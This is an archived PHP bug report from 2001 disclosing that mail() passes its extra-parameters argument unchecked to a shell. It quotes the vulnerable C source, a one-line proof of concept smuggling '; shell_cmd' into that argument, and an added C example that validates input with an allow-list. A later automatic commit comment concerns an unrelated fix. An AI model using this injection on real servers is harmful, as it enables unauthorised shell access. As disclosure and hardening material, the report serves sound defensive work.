Bug #12268 Security bug in php 4.0.5+
Submitted: 2001-07-19 19:29 UTC
Modified: 2001-07-26 21:40 UTC
From: hard dot disk at uol dot com dot br
Assigned:
Status: Closed
Package: Mail related
PHP Version: 4.0.5
OS: Any
Private report: No
CVE-ID: None
 [2001-07-19 19:29 UTC] hard dot disk at uol dot com dot br
http://www.net-security.org/text/bugs/995534103,28541,.shtml:


PHP Mail Function Vulnerability
Posted on 19.7.2001
The PHP mail() function does not check for shell escape commands, even if
PHP is running in safe_mode.
So it may be possible to bypass the safe_mode restriction and gain shell
access.
Affected:
php4.0.6
php4.0.5
Significant lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");
Exploit:
mail("toto@toto.com",
     "test",
     "test",
     "test",
     "; shell_cmd");
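
Added example, not part of the original report and not PHP's own code: the concatenation pattern quoted from ext/standard/mail.c next to a builder that validates the extra argument against an allow-list before the string could reach popen(). The sendmail path and flags, the function names and the allowed character set are assumptions made for illustration; nothing is executed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define SENDMAIL_BASE "/usr/sbin/sendmail -t -i"  /* assumed path and flags */

/* Pattern from the report: extra_cmd is appended unchanged, so the string
 * later handed to popen() (and therefore to /bin/sh -c) contains whatever
 * the script supplied. Bounded here with snprintf(), unlike strcat(). */
static int build_cmd_unchecked(char *out, size_t outlen, const char *extra)
{
    int n = snprintf(out, outlen, "%s %s", SENDMAIL_BASE, extra);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Allow-list (assumed policy): letters, digits, space and the few
 * characters needed for an option such as "-f user@example.com".
 * Every other byte, including shell metacharacters, is refused. */
static int extra_is_safe(const char *extra)
{
    for (const unsigned char *p = (const unsigned char *)extra; *p; p++) {
        if (!isalnum(*p) && strchr(" -_.@=+", *p) == NULL)
            return 0;
    }
    return 1;
}

/* Hardened builder: validate first, then format with a length check. */
static int build_cmd_checked(char *out, size_t outlen, const char *extra)
{
    if (!extra_is_safe(extra))
        return -1;
    return build_cmd_unchecked(out, outlen, extra);
}

int main(void)
{
    char cmd[256];
    /* Constructed sample inputs: a benign option and the report's string. */
    const char *samples[] = { "-f bounce@example.com", "; shell_cmd" };
    for (size_t i = 0; i < 2; i++) {
        int rc = build_cmd_checked(cmd, sizeof cmd, samples[i]);
        printf("%-24s -> %s\n", samples[i], rc == 0 ? cmd : "rejected");
    }
    return 0;
}
```

The allow-list only keeps shell metacharacters out of the command string; which sendmail options a script may pass is a separate policy decision.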

 [2001-07-19 20:56 UTC] rasmus@php.net
Fixed a while ago in CVS
 [2021-04-06 10:19 UTC] git@php.net
Automatic comment on behalf of 
Revision: https://github.com/php/pecl-system-expect/commit/f6d02a1562d44ab6297f2b55096bb220b891bc90
Log: Fixed #12268 (Capturing output via exp_loguser from within PHP / Apache):
Last updated: Tue Jul 01 07:01:33 2025 UTC